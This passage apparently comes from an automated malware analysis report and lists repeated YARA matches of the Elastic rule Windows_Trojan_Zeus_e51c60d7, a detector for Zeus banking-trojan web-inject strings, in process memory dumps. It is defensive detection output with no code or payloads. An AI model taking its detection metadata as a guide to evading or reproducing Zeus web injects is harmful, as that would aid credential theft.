      Source: 00000001.00000003.2086358360.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000001.00000003.2091561491.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000001.00000003.2010460715.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 0000000D.00000002.2203789493.00000000009A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000001.00000003.2025731561.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000001.00000002.2911583731.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 0000001D.00000002.2072822053.0000000003010000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000015.00000002.2052668868.0000000000C20000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000025.00000002.2089692841.0000000002650000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000013.00000002.2052202062.0000000002D80000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000001.00000003.2104048966.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000001.00000003.2079645449.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000005.00000002.2204891369.0000000002890000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000001.00000002.2912354659.0000000002D83000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000005.00000002.2204103743.0000000000E40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000001.00000003.2088591684.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000010.00000002.2047246012.0000000002FE0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000027.00000002.2089771985.0000000002940000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 0000001F.00000002.2078570583.0000000000850000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000001.00000003.2085749007.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000001.00000003.2107473137.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000001.00000003.2107627120.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000001.00000003.2107190009.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000001.00000003.1664876030.0000000002570000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000001.00000003.2100321942.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000001.00000003.2064074801.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000001.00000003.2106495197.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000025.00000002.2089952227.00000000027F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000019.00000002.2060118057.0000000001020000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000001.00000003.2046920489.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000001.00000003.2082103389.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000008.00000002.2204253925.0000000001280000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000001.00000003.2103873411.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000001.00000003.2060038870.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000001.00000002.2911583731.0000000002515000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000001.00000003.2086084822.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000001.00000003.2033279627.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 00000001.00000003.2090984983.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
